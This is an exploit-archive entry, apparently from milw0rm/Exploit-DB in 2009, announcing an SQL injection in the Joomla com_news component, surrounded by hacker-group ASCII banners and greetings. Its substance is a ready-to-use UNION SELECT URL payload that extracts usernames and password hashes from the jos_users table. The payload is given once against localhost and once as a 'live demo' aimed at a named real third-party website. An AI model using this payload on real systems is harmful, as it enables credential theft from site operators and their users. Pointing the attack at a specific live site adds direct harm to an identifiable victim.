Joomla! Component com_news - SQL Injection

EDB-ID:

7828

CVE:

N/A

Author:

snakespc

Type:

webapps

Platform:

PHP

Published:

2009-01-19

==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	                    Joomla Component news SQL Injection Vulnerability                            +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: snakespc@gmail.com:::::::             
                =                                                                                    =                                                                                   =
                =                               "com_news"                                           =
                  ===================================GAZA=============================================

Exploit:
http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
********
Live demo:
http://www.fermaten.dk/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N:::
ALL www.Snakespc.com/SC >>>> Members 
Str0ke ....Milw0rm
==================================================================GAZA============================================================

# milw0rm.com [2009-01-19]